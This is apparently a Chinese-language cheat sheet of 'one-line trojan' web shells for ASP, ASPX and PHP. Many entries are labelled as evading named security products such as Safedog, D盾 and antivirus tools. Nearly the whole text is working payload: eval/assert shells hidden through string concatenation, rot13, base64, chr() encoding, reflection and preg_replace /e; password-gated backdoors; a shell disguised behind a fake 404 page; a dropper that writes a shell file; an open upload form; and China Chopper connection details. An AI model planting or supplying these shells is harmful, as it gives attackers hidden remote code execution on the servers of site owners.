asp一句话木马：<%eval request("x")%>
php一句话木马：<?php eval($_POST[g]);?>
aspx一句话：<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>
数据库加密一句话(密码a)：┼攠數畣整爠煥敵瑳∨≡┩愾
网站配置、版权信息专用一句话："%><%Eval Request(x)%>
一句话再过护卫神：<%Y=request("x")%> <%execute(Y)%>
过拦截一句话木马：<% eXEcGlOBaL ReQuEsT("x") %>
asp闭合型一句话 %><%eval request("0o1Znz1ow")%><%
能过安全狗的解析格式：;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg
突破安全狗的一句话：<%Y=request("x")%> <%eval(Y)%>
elong过安全狗的php一句话：<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST[cc]);  ?>
后台常用写入php一句话（密码x）：
<?
$fp = @fopen("c.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[x])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
高强度php一句话：
<?php substr(md5($_REQUEST['heroes']),28)=='acd0'&&eval($_REQUEST['c']);?>
新型变异PHP一句话(密码b4dboy):
($b4dboy = $_POST['b4dboy']) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);
突破安全狗的aspx一句话：
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
突破护卫神，保护盾一句话：
<?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["test"]); ?>
许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传，这样一句话木马就写入不进数据库了。
改成：〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉
这样就避开了使用〈%%〉，保存为.ASP,程序照样执行的效果是一样的。
PHP高强度一句话：
<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>   菜刀连接：/x.php?x=lostwolf  脚本类型：php  密码：c
<?php assert($_REQUEST["c"]);?>    菜刀连接 躲避检测 密码：c



asp
_________________
<%
estcc=request("sb")
If estcc<>"" Then 
ExecuteGlobal(estcc):response.End
End If
%>
过狗
_______________________________________________________________________________________________

<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

密码P   绕过iisuser的asp不死一句话

__________________________________________________________________________________________________
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%> 


密码z

绝非网上泛滥的垃圾脚本
————————————————————————————————————————————————————————————————————————————————————————————————————————————

_____________________________________________
"%><%eval request("x")%><%s="
_______________________________________________ 
____________________________________________________________________
<script language=VBScript runat=server>execute request("x")</script>
____________________________________________________________________
<%25Execute(request("x"))%25>
____________________________________________________________________
<script language=VBScript runat=server>execute request("x")</script> 
_____________________________________________________________________
gif8a;<%execute(request("x"))%>

____________________________
<%
dim a
a=request(chr(97))
on error resume next       
execute a
response.write("m0un")
%>
_____________________________
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("x"))%>   
_________________________________________________________________________________



<%eval request(chr(35))%>

_____________________________________________________















aspx

g9f8<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>

______________________________________________________

aspx变形一句话 密码z

<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%

popup(popup(System.Text.Encoding.GetEncoding(65001).

GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));

%>

___________________________________________________________

_______________________________
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["x"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

x


_______________________________________





















php
gif8a;<?php eval($_POST[x);?>
___________________________________
<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST[x]);  ?>

__________________________________________
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /test/download/test1.php was not found on this server.</p>
</body></html>
<?php  
@preg_replace("/[checksql]/e",$_POST['x'],"saft");  
?> 
________________________________________________ 
  <?php
/**
* eval($_POST["c"]);
* assert
*/
class TestClass { }  
//随便注册一个类
$rc = new ReflectionClass('TestClass');
//实例化一个放射类
$str=$rc->getDocComment();
//拿到了我对testClass类的注释
$pos=strpos($str,'e');
$eval=substr($str,$pos,18);
$pos=strpos($str,'assert');
$fun=substr($str,$pos,6);
//这个获取文本,以便用于构造动态函数。
echo $eva;
$fun($eval);
//这个就是执行了。

?> 

密码C     过D盾的pHp一句话木马
______________________________________

< ?php
if(isset($_POST['page'])) {
	$page = $_POST[page];
	preg_replace("/[errorpage]/e",$page,"saft");
	exit;
}
?>


(2) 
< ?
md5($_GET['qid'])=='850abe17d6d33516c10c6269d899fd19'?array_map("asx73ert",(array)$_REQUEST['page']):next;
?>
shell.php?qid=zxexp  密码page

_____________________________________

< ?php eval(str_rot13('riny($_CBFG[x]);'));?> 


不含  get  post  
_______________________________________
<?php array_map("ass\x65rt",(array)$_REQUEST['x']);?>    x   过安全狗 
__________________________________________

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

密码为1   过各种杀软
________________________________________________

<?php $s=@$_GET[2];if(md5($s.$s)=="e67c2597ecad64bb4cdad6633b04107f")@eval($_REQUEST[$s]); ?> 
————————————————————————————————————————————————————————————————————————————————————————————————


<?php  
if($_GET["fuck"]=="you"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?><form method="post" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><?php }?> 


————————————————————————
<?php $x=base64_decode("YXNzZXJ0");$x($_POST['x']);?>